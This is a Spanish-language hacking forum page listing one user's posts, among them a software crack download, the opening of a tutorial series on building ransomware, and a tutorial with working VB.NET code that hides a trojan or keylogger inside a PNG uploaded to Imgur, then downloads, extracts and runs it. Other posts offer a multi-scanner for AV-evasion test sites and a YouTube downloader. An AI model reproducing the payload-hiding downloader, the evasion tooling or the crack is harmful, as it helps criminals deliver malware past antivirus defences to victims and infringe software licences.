Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - fudmario

Páginas: 1 [2] 3
21
C# - VB.NET / GhostDoc Pro v5.1.16036 + Patch
« en: Marzo 22, 2016, 11:18:39 pm »
Cita de: WarNov
Sin documentación, el software nace, crece, se vuelve spaghetti, desquicia a los developers y todos mueren.


GhostDoc es una extensión para Visual Studio que genera comentarios de documentación XML automáticamente para métodos y propiedades, basándose en su tipo, parámetros, nombre y otra información contextual.


IDEs Soportados:
  • Visual Studio 2015(incl. Community Edition)
  • Visual Studio 2013
  • Visual Studio 2012
  • Visual Studio 2010
  • Visual Studio 2008

Lenguajes Soportados:
  • C#
  • Visual Basic
  • C++/CLI
  • JavaScript

El parche extiende el tiempo de uso en su version Trial, obteniendo utilizar todas las opciones disponibles en su version PRO(El unico problema, La Marca de Agua):



Marca de Agua:



Descarga(App): You are not allowed to view links. Register or Login
Descarga(Patch): You are not allowed to view links. Register or Login
Contraseña: upload_by_fudmario


Una Alternativa Gratuita es Sandcastle(Sandcastle Help File Builder: shfb.codeplex.com)


22
Hola a todos, en esta serie de publicaciones vamos a explicar el funcionamiento de un malware del tipo “Crypto-Ransomware” o “filecoder”, como siempre, intentando de ser lo más simple y sencillo para su aprendizaje(No entraremos mucho en conceptos, solo lo suficiente para lograr comprenderlo).

En anteriores publicaciones que hice hace tiempo...xD explique  técnicas de análisis y desinfección de este tipo de Malware.
Los que NO lo vieron, pueden  mirarlo aquí->

Esta serie de publicaciones será como ver desde el otro lado en el cual nuestro objetivo será Entender el funcionamiento, creación, montaje de este tipo de malware.
No sé cuántas publicaciones sean o si me alcanzará el tiempo a terminarlas todas...xD, pero intentaré terminarlo todo.

Preguntas Frecuentes:
¿Porque crear este Tutorial?

R. Para aprender el funcionamiento de este tipo de malware y así poder evitar posibles infecciones(o para promover el desarrollo de software malicioso....xDD). Cada quien es responsable del uso que le dé a esta información.

¿Me Ayudarías a Crear uno completamente FUD y ayudar a Montarlo para poder Infectar?

R.- NO.  El tutorial explicará cómo crearlo paso a paso, como se puede crear, montar, pero bajo ninguna circunstancia ayudaré a cometer Delitos, a no ser que sea por Dinero....xDD.
 
¿Y por qué no crearlo más antes? , ¿Si hay mucha información al Respecto para que hacerlo ahora?
R.- Y bueno como tengo unos días de vacación, dije: "Bueno porque no Crearlo,....xD".

¿Qué pretendes  con esta Información?

Que más allá de conocer cómo funciona este tipo de malware, es también incentivar a usuarios a aprender algún lenguaje de programación, ya que el lenguaje que conozco un poco más es VB.NET usaremos ese….xD, pero se intentará dar la información necesaria para que puedan extrapolar la información y aplicarlo a diferentes lenguaje.

 
Comencemos....

RANSOMWARE:
Citar
Este tipo de malware lo que básicamente hace es: Secuestrar nuestra información, en la cual mediante diversas técnicas  puede  llegar a Bloquear el acceso a nuestro Sistema, cifrar archivos (generalmente: pdf,doc, docx, pptp.....etc los más usados), obligando a la víctima a dar una cierta cantidad de dinero para poder recuperar la información.
En ciertas ocasiones cuando este tipo de malware utiliza un algoritmo de cifrado débil o guarda la contraseña de cifrado en algún lugar de nuestra PC o si el archivo es eliminado de forma estándar, es posible llegar a recuperarlo sin pagar.

Veamos cómo funciona con una muestra analizada: “CTB-Locker (Curve-Tor-Bitcoin Locker)”
Una vez ejecutada el malware lo que hace es comenzar a cifrar archivos  generalmente a archivos comunes.

Posteriormente nos muestra un mensaje (algo similar cambiando nuestro wallpaper,...etc):


En la cual nos da información sobre como rescatar nuestra información:
Online:

Offline:

Para agregar nuestra Public Key hay que ingresar a la Url que nos da:

Y después de Agregar la Public Key.


En la cualquiera de los dos casos nos da las instrucciones para poder pagar el rescate y recuperar nuestra información.

Bueno hasta aquí hoy…xD, es una pequeña introducción sobre el Tema.

Nuestra meta será crear nuestro propio virus, luego nuestro propio Builder/Constructor para generar el virus, montar nuestro panel  de nuestro Crypto-Ransomware agregar varias funciones/opciones.

Avances:
 
  • En la siguiente entrega explicaremos, cuál será la estructura de nuestro propio Crypto-Ransomware.
  • Crear la estructura de nuestro primer Crypto-Ransomware (Modo Offline) basado en el ejemplo anterior y que opciones contendrá nuestro Virus…xD.
  • Comenzaremos  a programar nuestras primeras líneas de código (Enumeración de archivos, filtración por extensiones y más…..xD).

23
Casi siempre me pregunta por SKYPE, si conozco algun hosting de descarga directa que no detecte los antivirus, para subir malware, por lo general siempre respondo: "NO, no conozco ninguno, pero puedes usar cualquier Hosting xD", asi que hoy les voy a mostrar como usar cualquier hosting para subir malware.

Hoy hablaremos sobre un tipo de malware llamado: Downloader.

¿Qué es un Downloader?

Citar
Este tipo de malware lo que hace es descarga en secreto archivos maliciosos desde un servidor remoto, para posteriormente ejecutarlo,instalar software malicioso en el Sistema.
Citar
Basicamente lo que hace es descargar malware(troyanos,keyloggers,...,etc.) subido en algun hosting, generalmente se usan hosting de descarga directa(ej: You are not allowed to view links. Register or Login) o en algunos casos suben a servidores tipo Pastebin, paste.ee o similares previamente codificado (El problema principal de estos hosting de descarga directa es que son detectados por los AntiVirus.).

 
Ya sabiendo que es y como funciona, voy a explicar como crear uno (No es muy complicado en realidad es muy sencillo):
Para este proposito usaremos un hosting que permite subir Imagenes llamado "Imgur", si, si Imgur...xD un servidor web que nos permite el almacenamiento de Imagenes.

Subir directamente cambiando de extension a un ejecutable(por un .jpg o .png) no funcionará debido a sus medidas de proteccion que usa para subir imagenes en IMGUR.



Lo que haremos será unir: "imagen + ejecutable",sencillo no?, con eso ya tendriamos solucionado el tema de subir sin problemas el malware, 

El lenguaje de programacion que elijan  para crearlo es indistinto, yo lo haré en VB.NET.

Para unir : "Imagen + Server", lo haremos de la siguiente forma:
 

Código: (vbnet) You are not allowed to view links. Register or Login
Dim imgbytes As Byte() = IO.File.ReadAllBytes("D:\img.png") ' Leemos el contenido de la Imagen
        Dim serverbytes As Byte() = IO.File.ReadAllBytes("D:\Anotador.exe") ' Leemos el Contenido del Malware(troyanos, keylogger,....etc)
        Using fs As New IO.FileStream("tmp.png", IO.FileMode.Create) ' Comenzaremos a escribir nuestra nueva imagen con la Imagen Inicial + Server.
            fs.Write(imgbytes, 0, imgbytes.Length)
            fs.Write(serverbytes, 0, serverbytes.Length)
        End Using
        MessageBox.Show("Done!!!")

Subimos la Imagen al Imgur:


Para Descargar el Server, lo haremos de la siguiente manera:

Código: (vbnet) You are not allowed to view links. Register or Login
Dim imgbytes As Byte() ' Variable para almacenar la imagen
Const imgSize As Integer = 17083   ' Tamaño de la Imagen Inicial
Using wc As New Net.WebClient()
    imgbytes = wc.DownloadData("http://i.imgur.com/6TZKG9q.png")
    Using ms As New IO.MemoryStream(imgbytes, imgSize, imgbytes.Length - imgSize) 'Aqui obtenemos el tamaño del malware, separando de la imagen Inicial.
        ' Aqui se puede hacer cualquier cosa, droppear el archivo en Disco/
        ' IO.File.WriteAllBytes("D:\Test1.exe", ms.ToArray)
        ' Process.Start("D:\Test1.exe")
    End Using
End Using

Algunas cosas que debes considerar:

Si vemos con algun editor Hexadecimal, veremos que se puede ver el ejecutable, una opcion es cifrar el archivo.



Pues nada cualquier duda comentar en el hilo, Mensaje Privado o  por Skype.


 

24
C# - VB.NET / [Vb.Net] YouTubeHelper by fudmario
« en: Noviembre 21, 2015, 12:22:57 am »
Código: (vbnet) You are not allowed to view links. Register or Login
' ***********************************************************************
' Assembly         : Youtube Downloader
' Author           : fudmario
' Created          : 15-06-2015
'
' Last Modified By : fudmario
' Last Modified On : 11-20-2015
' ***********************************************************************
' <copyright file="YoutubeHelper.vb" company="FudmarioDev">
'     '     Copyright ©  2015
'
' </copyright>
' <summary></summary>
' *************************************************************************

Option Explicit On
Option Strict On
Option Infer On

Imports System.Collections.Specialized
Imports System.Net
Imports System.Text
Imports System.Text.RegularExpressions
Imports System.Web

''' <summary>
''' Class YoutubeHelper. Esta Clase no puede ser Heredada.
''' </summary>
Public NotInheritable Class YoutubeHelper
    ''' <summary>
    ''' Url para Obtener la Información del Video
    ''' </summary>
    Private Const InfoUrl As String = "[youtube]http://www.youtube.com/get_video_in[/youtube]fo?video_id="

    ''' <summary>
    ''' Expresión Regular para obtener el Link de la imagen del Video.
    ''' </summary>
    ''' <value>The imagen.</value>
    Private Shared ReadOnly Property Imagen As Regex
        Get
            Return New Regex("<meta\sproperty=""og:image""\scontent=""(.*?default\.jpg)"">")
        End Get
    End Property

    ''' <summary>
    ''' Expresion Regular para Obtener el Título del video.
    ''' </summary>
    ''' <value>The title.</value>
    Private Shared ReadOnly Property Title As Regex
        Get
            Return New Regex("<meta\sproperty=""og:title""\scontent=""(.*?)"">")
        End Get
    End Property

    ''' <summary>
    ''' Expresion Regular para obtener la Descripción del Video.
    ''' </summary>
    ''' <value>Descripción del Video.</value>
    Private Shared ReadOnly Property Description As Regex
        Get
            Return New Regex("<meta\sproperty=""og:description""\scontent=""(.*?)"">")
        End Get
    End Property

    ''' <summary>
    ''' Expresion Regular para obtener la Duracion del Video (en segundos).
    ''' </summary>
    ''' <value> Duracion del Video (en segundos).</value>
    Private Shared ReadOnly Property Duration As Regex
        Get
            Return New Regex("length_seconds"":""(.*?)"",")
        End Get
    End Property

''' <summary>
    ''' Obtiene Informacion sobre la Url de Video de Youtube.
    ''' </summary>
    ''' <param name="url">Url del Video de YouTube.</param>
    ''' <param name="byPass">Si se establece como <c>true</c> aplicamos el bypass.</param>
    ''' <returns>YouTubeVideoInformation.</returns>
    ''' <exception cref="ArgumentNullException">La <paramref name="url" /> no puede estar vacia;url</exception>
    ''' <exception cref="FormatException">Formato de <paramref name="url" /> Invalido;Url</exception>
    Public Shared Function GetYouTubeVideoInfo(url As String, Optional ByVal byPass As Boolean = False) As YouTubeVideoInformation

        If String.IsNullOrEmpty(url) Then Throw New ArgumentNullException(message:="La Url no puede estar vacia", paramName:="URL")

        If Not Regex.IsMatch(url, "(http|https):..(www\.)?youtube.com.watch\?v=") Then Throw New FormatException(message:="Formato de Url Invalido")

        Dim videoInfoFull As New YouTubeVideoInformation
        Dim infoVideo As New List(Of YoutubeVideoInfo)
        Dim adInfoVideo As YoutubeVideoInfo
        Dim mSource As String
        Dim arrayParams As NameValueCollection

        Using c As New WebClient
            c.Encoding = Encoding.GetEncoding(1252)
            mSource = c.DownloadString(url)

            Select Case byPass
                Case True
                    arrayParams = HttpUtility.ParseQueryString(HttpUtility.HtmlDecode(c.DownloadString(String.Format("{0}{1}&el=vevo", InfoUrl, HttpUtility.ParseQueryString(New Uri(url).Query).Get("v")))))
                Case Else
                    arrayParams = HttpUtility.ParseQueryString(HttpUtility.HtmlDecode(c.DownloadString(String.Format("{0}{1}", InfoUrl, HttpUtility.ParseQueryString(New Uri(url).Query).Get("v")))))
            End Select
        End Using

        Dim ytTitle As String = HttpUtility.HtmlDecode(Title.Match(mSource).Groups(1).Value)
        Dim ytDescription As String = HttpUtility.HtmlDecode(Description.Match(mSource).Groups(1).Value)
        Dim ytDuration As Double = CDbl(Duration.Match(mSource).Groups(1).Value)
        Dim ytImg As String = Imagen.Match(mSource).Groups(1).Value

        If arrayParams("status") = "ok" Then

            Dim urLs As String() = arrayParams("url_encoded_fmt_stream_map").Split(","c)
            Dim sb As New StringBuilder()
            For i = 0 To urLs.Length - 1
                adInfoVideo = New YoutubeVideoInfo()
                sb.Clear()
                Dim mUriDec As String = HttpUtility.HtmlDecode(urLs(i))
                Dim urlParams As NameValueCollection = HttpUtility.ParseQueryString(mUriDec)
                Dim vidFormat As String = HttpUtility.HtmlDecode(urlParams("type"))
                sb.Append(HttpUtility.HtmlDecode(urlParams("Url")))
                sb.AppendFormat("&signature={0}", HttpUtility.HtmlDecode(urlParams("sig")))
                sb.AppendFormat("&type={0}", vidFormat)
                sb.AppendFormat("&title={0}", HttpUtility.HtmlDecode(arrayParams("title")))

                Dim format As String = vidFormat.Split(";"c)(0).Split("/"c)(1)
                If format.Contains("x-flv") Then
                    format = "flv"
                End If

                adInfoVideo.Url = sb.ToString
                adInfoVideo.Quality = urlParams("quality")
                adInfoVideo.Format = format
                infoVideo.Add(adInfoVideo)
            Next
            videoInfoFull.ErrorCode = 0
            videoInfoFull.LinksDetails = infoVideo
            videoInfoFull.Title = ytTitle
            videoInfoFull.Duration = ytDuration
            videoInfoFull.Description = ytDescription
            videoInfoFull.ImgLink = ytImg
            Return videoInfoFull
        Else
            videoInfoFull.ErrorCode = 1
            videoInfoFull.ErrorMsg = HttpUtility.HtmlDecode(arrayParams("reason"))
            Return videoInfoFull
        End If

    End Function
End Class

''' <summary>
''' Información Básica del Video.
''' </summary>
Public Class YoutubeVideoInfo
    ''' <summary>
    ''' Obtiene o Establece la Url Directa del Video.
    ''' </summary>
    ''' <value>Url Directa del Video.</value>
    Public Property Url() As String
    ''' <summary>
    ''' Obtiene o Establece el Formato del Video.
    ''' </summary>
    ''' <value>Formato del Video.</value>
    Public Property Format() As String

    ''' <summary>
    ''' Obtiene o Establece La Calidad del Video.
    ''' </summary>
    ''' <value>Calidad del Video.</value>
    Public Property Quality() As String

End Class

''' <summary>
''' Información Completa del Video de YouTube.
''' </summary>
Public Class YouTubeVideoInformation
    ''' <summary>
    ''' Obtiene o Establece la lista de Link's Disponibles y Informacion Adicional.
    ''' </summary>
    ''' <value>lista de Link's Disponibles.</value>
    Public Property LinksDetails() As List(Of YoutubeVideoInfo)

    ''' <summary>
    ''' Obtiene o Establece El Titulo del Video.
    ''' </summary>
    ''' <value>El Titulo del Video.</value>
    Public Property Title() As String

    ''' <summary>
    ''' Obtiene o Establece El link de la Imagen del Video.
    ''' </summary>
    ''' <value>El link de la Imagen del Video.</value>
    Public Property ImgLink() As String

    ''' <summary>
    ''' Obtiene o Establece la Descripción del Video.
    ''' </summary>
    ''' <value>la Descripción del Video.</value>
    Public Property Description() As String

    ''' <summary>
    ''' Obtiene o Establece la Duracion del Video.
    ''' </summary>
    ''' <value>Duracion del Video.</value>
    Public Property Duration() As Double
    ''' <summary>
    ''' Obtiene o Establece el codigo de Error: 0 = No Error, 1 = Error.
    ''' </summary>
    ''' <value>codigo de Error: 0 = No Error, 1 = Error..</value>
    Public Property ErrorCode() As Integer

    ''' <summary>
    ''' Obtiene o Establece el Mensaje de Error.
    ''' </summary>
    ''' <value>Mensaje de Error.</value>
    Public Property ErrorMsg() As String
End Class



  • Ejemplo de Uso:

Código: (vbnet) You are not allowed to view links. Register or Login
Dim response As YouTubeVideoInformation
        response = YoutubeHelper.GetYouTubeVideoInfo("[youtube]https://www.youtube.com/watch?v=mWRsgZuwf_8[/youtube]", True)
        If response.ErrorCode = 0 Then

            Dim sb As New System.Text.StringBuilder
            sb.AppendLine(String.Format("Titulo: {0}", response.Title))
            sb.AppendLine(String.Format("Descripción: {0}", response.Description))
            sb.AppendLine(String.Format("Duración: {0}", TimeSpan.FromSeconds(response.Duration).ToString("hh\:mm\:ss")))
            sb.AppendLine(String.Format("Url de la Imagen: {0}", response.ImgLink))
            sb.AppendLine()
            sb.AppendLine("Urls: ")
            For Each urldetails As YoutubeVideoInfo In response.LinksDetails

                sb.AppendLine("*************************")
                sb.AppendLine(String.Format("Url: {0}", urldetails.Url))
                sb.AppendLine(String.Format("Formato: {0}", urldetails.Format))
                sb.AppendLine(String.Format("Calidad: {0}", urldetails.Quality))

            Next
            MessageBox.Show(sb.ToString)
        Else
            MessageBox.Show(response.ErrorMsg)
        End If
      
  • Retorna:

Código: You are not allowed to view links. Register or Login
Titulo: Imagine Dragons - Demons (Official)
Descripción: Get Smoke + Mirrors on iTunes now: http://smarturl.it/IDSmokeMirrors Get Smoke + Mirrors Deluxe version with 4 exclusive songs only at Target: http://smartur...
Duración: 00:03:57
Url de la Imagen: https://i.ytimg.com/vi/mWRsgZuwf_8/maxresdefault.jpg

Urls:
*************************
Url: http://r1---sn-o0x85uxa-a2ce.googlevideo.com/videoplayback?mt=1448075110&mv=m&initcwndbps=180000&itag=22&ms=au&upn=hhv_O7PIcl0&pcm2=no&mm=31&mn=sn-o0x85uxa-a2ce&expire=1448096854&mime=video%2Fmp4&pl=20&source=youtube&ratebypass=yes&dur=236.170&lmt=1429535723891505&key=yt6&ipbits=0&gcr=bo&sparams=dur%2Cgcr%2Cid%2Cinitcwndbps%2Cip%2Cipbits%2Citag%2Clmt%2Cmime%2Cmm%2Cmn%2Cms%2Cmv%2Cpcm2%2Cpcm2cms%2Cpl%2Cratebypass%2Csource%2Cupn%2Cexpire&fexp=9407156%2C9408710%2C9413137%2C9416126%2C9417683%2C9419445%2C9419837%2C9420452%2C9421097%2C9421166%2C9421411%2C9422323%2C9422541%2C9422596%2C9422618%2C9422838%2C9422992%2C9423042%2C9423431%2C9423489%2C9423643%2C9423662%2C9423667%2C9424509%2C9424740&id=o-APsq1d2t11trGfv2qYsVS9NyPHMMqsQcMSBaV7pEXwYP&sver=3&ip=161.22.129.235&signature=5582F3AC476FB6403987BF9C3CAE4DC4661C5FBB.4079167906F1B6388735F66E18D9F1C47FCF4137&pcm2cms=yes&signature=&type=video/mp4; codecs="avc1.64001F, mp4a.40.2"&title=Imagine Dragons - Demons (Official)
Formato: mp4
Calidad: hd720
*************************
Url: http://r1---sn-o0x85uxa-a2ce.googlevideo.com/videoplayback?mt=1448075110&mv=m&initcwndbps=180000&itag=43&ms=au&upn=hhv_O7PIcl0&pcm2=no&mm=31&mn=sn-o0x85uxa-a2ce&expire=1448096854&mime=video%2Fwebm&pl=20&source=youtube&ratebypass=yes&dur=0.000&lmt=1367614381944548&key=yt6&ipbits=0&gcr=bo&sparams=dur%2Cgcr%2Cid%2Cinitcwndbps%2Cip%2Cipbits%2Citag%2Clmt%2Cmime%2Cmm%2Cmn%2Cms%2Cmv%2Cpcm2%2Cpcm2cms%2Cpl%2Cratebypass%2Csource%2Cupn%2Cexpire&fexp=9407156%2C9408710%2C9413137%2C9416126%2C9417683%2C9419445%2C9419837%2C9420452%2C9421097%2C9421166%2C9421411%2C9422323%2C9422541%2C9422596%2C9422618%2C9422838%2C9422992%2C9423042%2C9423431%2C9423489%2C9423643%2C9423662%2C9423667%2C9424509%2C9424740&id=o-APsq1d2t11trGfv2qYsVS9NyPHMMqsQcMSBaV7pEXwYP&sver=3&ip=161.22.129.235&signature=554A1CF81CD9B1BA71DCD24B2FCD5A0AE436A91E.937BA2CFC7599B38359F410DB6C3A15BE977131E&pcm2cms=yes&signature=&type=video/webm; codecs="vp8.0, vorbis"&title=Imagine Dragons - Demons (Official)
Formato: webm
Calidad: medium
*************************
Url: http://r1---sn-o0x85uxa-a2ce.googlevideo.com/videoplayback?mt=1448075110&mv=m&initcwndbps=180000&itag=18&ms=au&upn=hhv_O7PIcl0&pcm2=no&mm=31&mn=sn-o0x85uxa-a2ce&expire=1448096854&mime=video%2Fmp4&pl=20&source=youtube&ratebypass=yes&dur=236.170&lmt=1429535713281062&key=yt6&ipbits=0&gcr=bo&sparams=dur%2Cgcr%2Cid%2Cinitcwndbps%2Cip%2Cipbits%2Citag%2Clmt%2Cmime%2Cmm%2Cmn%2Cms%2Cmv%2Cpcm2%2Cpcm2cms%2Cpl%2Cratebypass%2Csource%2Cupn%2Cexpire&fexp=9407156%2C9408710%2C9413137%2C9416126%2C9417683%2C9419445%2C9419837%2C9420452%2C9421097%2C9421166%2C9421411%2C9422323%2C9422541%2C9422596%2C9422618%2C9422838%2C9422992%2C9423042%2C9423431%2C9423489%2C9423643%2C9423662%2C9423667%2C9424509%2C9424740&id=o-APsq1d2t11trGfv2qYsVS9NyPHMMqsQcMSBaV7pEXwYP&sver=3&ip=161.22.129.235&signature=D2B70E8991B19CB7C9485ACE6B3BBEDD33E0723F.568B020038DC5E2E55DDEE030D20904A49C60CA1&pcm2cms=yes&signature=&type=video/mp4; codecs="avc1.42001E, mp4a.40.2"&title=Imagine Dragons - Demons (Official)
Formato: mp4
Calidad: medium
*************************
Url: http://r1---sn-o0x85uxa-a2ce.googlevideo.com/videoplayback?mt=1448075110&mv=m&initcwndbps=180000&itag=5&ms=au&upn=hhv_O7PIcl0&sparams=dur%2Cgcr%2Cid%2Cinitcwndbps%2Cip%2Cipbits%2Citag%2Clmt%2Cmime%2Cmm%2Cmn%2Cms%2Cmv%2Cpcm2%2Cpcm2cms%2Cpl%2Csource%2Cupn%2Cexpire&mm=31&mn=sn-o0x85uxa-a2ce&expire=1448096854&pcm2=no&mime=video%2Fx-flv&pl=20&source=youtube&dur=236.173&lmt=1394291864022235&key=yt6&ipbits=0&gcr=bo&fexp=9407156%2C9408710%2C9413137%2C9416126%2C9417683%2C9419445%2C9419837%2C9420452%2C9421097%2C9421166%2C9421411%2C9422323%2C9422541%2C9422596%2C9422618%2C9422838%2C9422992%2C9423042%2C9423431%2C9423489%2C9423643%2C9423662%2C9423667%2C9424509%2C9424740&id=o-APsq1d2t11trGfv2qYsVS9NyPHMMqsQcMSBaV7pEXwYP&sver=3&ip=161.22.129.235&signature=8D3DBB8B362B16C5061F3400DE492270A3B5E015.958915343DB674110377E1F86EAA543A430485F4&pcm2cms=yes&signature=&type=video/x-flv&title=Imagine Dragons - Demons (Official)
Formato: flv
Calidad: small
*************************
Url: http://r1---sn-o0x85uxa-a2ce.googlevideo.com/videoplayback?mt=1448075110&mv=m&initcwndbps=180000&itag=36&ms=au&upn=hhv_O7PIcl0&sparams=dur%2Cgcr%2Cid%2Cinitcwndbps%2Cip%2Cipbits%2Citag%2Clmt%2Cmime%2Cmm%2Cmn%2Cms%2Cmv%2Cpcm2%2Cpcm2cms%2Cpl%2Csource%2Cupn%2Cexpire&mm=31&mn=sn-o0x85uxa-a2ce&expire=1448096854&pcm2=no&mime=video%2F3gpp&pl=20&source=youtube&dur=236.286&lmt=1394291766906263&key=yt6&ipbits=0&gcr=bo&fexp=9407156%2C9408710%2C9413137%2C9416126%2C9417683%2C9419445%2C9419837%2C9420452%2C9421097%2C9421166%2C9421411%2C9422323%2C9422541%2C9422596%2C9422618%2C9422838%2C9422992%2C9423042%2C9423431%2C9423489%2C9423643%2C9423662%2C9423667%2C9424509%2C9424740&id=o-APsq1d2t11trGfv2qYsVS9NyPHMMqsQcMSBaV7pEXwYP&sver=3&ip=161.22.129.235&signature=04F7754230405A8FC022D3537A2E316F4323C905.9A15CDF618BEB230096EE39F0EC26DAC16900FAE&pcm2cms=yes&signature=&type=video/3gpp; codecs="mp4v.20.3, mp4a.40.2"&title=Imagine Dragons - Demons (Official)
Formato: 3gpp
Calidad: small
*************************
Url: http://r1---sn-o0x85uxa-a2ce.googlevideo.com/videoplayback?mt=1448075110&mv=m&initcwndbps=180000&itag=17&ms=au&upn=hhv_O7PIcl0&sparams=dur%2Cgcr%2Cid%2Cinitcwndbps%2Cip%2Cipbits%2Citag%2Clmt%2Cmime%2Cmm%2Cmn%2Cms%2Cmv%2Cpcm2%2Cpcm2cms%2Cpl%2Csource%2Cupn%2Cexpire&mm=31&mn=sn-o0x85uxa-a2ce&expire=1448096854&pcm2=no&mime=video%2F3gpp&pl=20&source=youtube&dur=236.472&lmt=1394291698741556&key=yt6&ipbits=0&gcr=bo&fexp=9407156%2C9408710%2C9413137%2C9416126%2C9417683%2C9419445%2C9419837%2C9420452%2C9421097%2C9421166%2C9421411%2C9422323%2C9422541%2C9422596%2C9422618%2C9422838%2C9422992%2C9423042%2C9423431%2C9423489%2C9423643%2C9423662%2C9423667%2C9424509%2C9424740&id=o-APsq1d2t11trGfv2qYsVS9NyPHMMqsQcMSBaV7pEXwYP&sver=3&ip=161.22.129.235&signature=864F4C8D6C43652AA8CE344C5DBD12CA1B88FFBE.1996D808B12B0ED01CF517E5736FF2F9D0872855&pcm2cms=yes&signature=&type=video/3gpp; codecs="mp4v.20.3, mp4a.40.2"&title=Imagine Dragons - Demons (Official)
Formato: 3gpp
Calidad: small

25
C# - VB.NET / [Function] Adf.ly Decode by fudmario[vb.net]
« en: Septiembre 16, 2015, 12:01:51 pm »
Código: (vbnet) You are not allowed to view links. Register or Login
   Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
        TextBox1.Text = AdflyUrlDecode("http://adf.ly/1NfMkS")
       
    End Sub

' Return: https://itunes.apple.com/us/app/game-of-thrones-ascent/id799145075


Código: (vbnet) You are not allowed to view links. Register or Login
' ***********************************************************************
' Author           : fudmario
' Created          : 09-15-2015
'
' Last Modified By : fudmario
' Last Modified On : 09-16-2015
' ***********************************************************************
' <copyright file="Adfly_Decode.vb" company="fudmarioDev">
'     Copyright (c) fudmarioDev. All rights reserved.
' </copyright>
' <summary></summary>
' ***********************************************************************
Imports System.IO
Imports System.Net
Imports System.Text
Module AdflyDecode
    ''' <summary>
    '''     Decodifica una Url de Adf.ly.
    ''' </summary>
    ''' <param name="url">URL a decodificar.</param>
    ''' <returns>Retorna la Url Decodificada.</returns>
    Public Function AdflyUrlDecode(url As String) As String
        Try
            Dim sb As New StringBuilder
            Dim data As String = GetSource(url:=url)
            Dim rt As String() = {"ysmm = '", "'"c}
            Dim a As Integer = data.IndexOf(rt(0), StringComparison.Ordinal) + rt(0).Length + 1
            Dim b As Integer = data.Substring(a).IndexOf(rt(1), StringComparison.Ordinal) + 1
            Dim s As String = Mid(data, a, b)
            For i = 0 To s.Length - 1 Step 2
                sb.Append(s(i))
            Next
            For k = s.Length - 1 To 0 Step -2
                sb.Append(s(k))
            Next
            Return Encoding.ASCII.GetString(Convert.FromBase64String(sb.ToString())).Substring(2)
        Catch ex As Exception
            Return String.Empty
        End Try
    End Function

    ''' <summary>
    '''     Obtiene el Código Fuente de una Url.
    ''' </summary>
    ''' <param name="url">Url.</param>
    ''' <returns>Retorna el código fuente de una Url.</returns>
    Private Function GetSource(url As String) As String
        Try
            Return New StreamReader(WebRequest.Create(url).GetResponse().GetResponseStream()).ReadToEnd()
        Catch ex As Exception
            Return String.Empty
        End Try
    End Function
End Module


26
Hola a todos aqui les dejo una actualización del multi-scanner, los uploaders funcionaban correctamente en la version anterior
que postee, el problema estaba al momento de parsear los resultados, corregi esos errores  entre otros.

Paginas WebScan:
  • refud.me
  • viruscheckmate.com
  • nodistribute.com
  • scan4you.net(*Nuevo)-> Soporta ambos dominios(.ORG & .NET)(Es de Pago)
  • indetectables.net(*Nuevo)->Todos lo creditos para Atheros14 por el SourceCode y los tests
  • Soporta: agregarse al menu contextual de Windows
  • Soporta: Drag & Drop
  • Agregado: la opcion proxy funciona para todas las webs(a diferencia de la anterior version que solo era para nodistribute)



queria subir un VIDEO, pero como recien acabo de formatear mi pc, no tengo herramientas, asi que les dejo
el video de la anterior version(0.2 que no publique xD)



Algunas Capturas:







Ejemplos de Reportes:

 


FileName : Keygens.exe
FileSize : 32,09 Kb
MD5 :40fb309eb029041ea44e08e17de6fa04
Result 16/35

BBCode by You are not allowed to view links. Register or Login

AVG Free :OK
Avast :Win32:Malware-gen
AntiVir (Avira) :TR\/Dropper.Gen
BitDefender :Trojan.Generic.12194471
Clam Antivirus :OK
COMODO Internet Security :OK
Dr.Web :OK
eTrust-Vet :Win32\/LineZer0_i
F-PROT Antivirus :OK
F-Secure Internet Security :Trojan.Generic.12194471
G Data :Trojan.Generic.12194471
IKARUS Security :OK
Kaspersky Antivirus :OK
McAfee :OK
MS Security Essentials :OK
ESET NOD32 :ApplicUnwnt.MSIL\/Packed.Confuser.A
Norman :Trojan.Generic.12194471
Norton Antivirus :Trojan.Gen.2
Panda Security :OK
A-Squared :Trojan.Generic.12194471 (B)
Quick Heal Antivirus :OK
Solo Antivirus :OK
Sophos :OK
Trend Micro Internet Security :OK
VBA32 Antivirus :OK
Zoner AntiVirus :OK
Ad-Aware :Trojan.Generic.12194471
BullGuard :Gen:Variant.Symmi.47669
FortiClient :OK
K7 Ultimate :Trojan ( 003560791 )
NANO Antivirus :OK
Panda CommandLine :OK
SUPERAntiSpyware :Trojan.Agent\/Gen-Jorik.Process-1
Twister Antivirus :Virus.1C3A8E1AB65BC73A
VIPRE :Trojan.Win32.Generic=21BT



File Name: Keygens.exe

File Size: 32,09 Kb

Scan Date: 02/08/2015

Scan Result: 15/34

MD5: 40fb309eb029041ea44e08e17de6fa04

Verified By NoDistribute: You are not allowed to view links. Register or Login



A-SquaredTrojan.Generic.12194471 (B)
AVG Free : Clean
Ad-AwareTrojan.Generic.12194471
AntiVir (Avira)TR/Dropper.Gen
AvastWin32:Malware-gen
BitDefenderTrojan.Generic.12194471
BullGuardGen:Variant.Barys.9361
COMODO Internet Security : Clean
Clam Antivirus : Clean
Dr.Web : Clean
F-PROT Antivirus : Clean
F-Secure Internet SecurityTrojan.Generic.12194471
FortiClient : Clean
G DataTrojan.Generic.12194471
IKARUS Security : Clean
K7 UltimateTrojan ( 003560791 )
Kaspersky Antivirus : Clean
MS Security Essentials : Clean
McAfee : Clean
NANO Antivirus : Clean
NormanTrojan.Generic.12194471
Norton AntivirusTrojan.Gen.2
Panda CommandLine : Clean
Panda Security : Clean
Quick Heal Antivirus : Clean
SUPERAntiSpywareTrojan.Agent/Gen-Jorik.Process-1
Solo Antivirus : Clean
Sophos : Clean
Trend Micro Internet Security : Clean
Twister AntivirusVirus.1C3A8E1AB65BC73A
VBA32 Antivirus : Clean
VIPRETrojan.Win32.Generic=21BT
Zoner AntiVirus : Clean
eTrust-VetWin32/LineZer0_i






Código: You are not allowed to view links. Register or Login
FileName: Multi-Scanner v0.3 by fudmario.exe
FileSize: 3139,5 Kb
Hash MD5: 8a41d825adf05fe7da2b59ac3ca7af25

Descarga:
Ejecutable: You are not allowed to view links. Register or Login
Nueva Descarga:   You are not allowed to view links. Register or Login
         
Dependencias: You are not allowed to view links. Register or Login

Contraseña:  byfudmario



Nota_1: Requiere WinRAR 5 para descomprimir.
Nota_2: Requiere que las .dll este en la misma Ruta del Ejecutable.
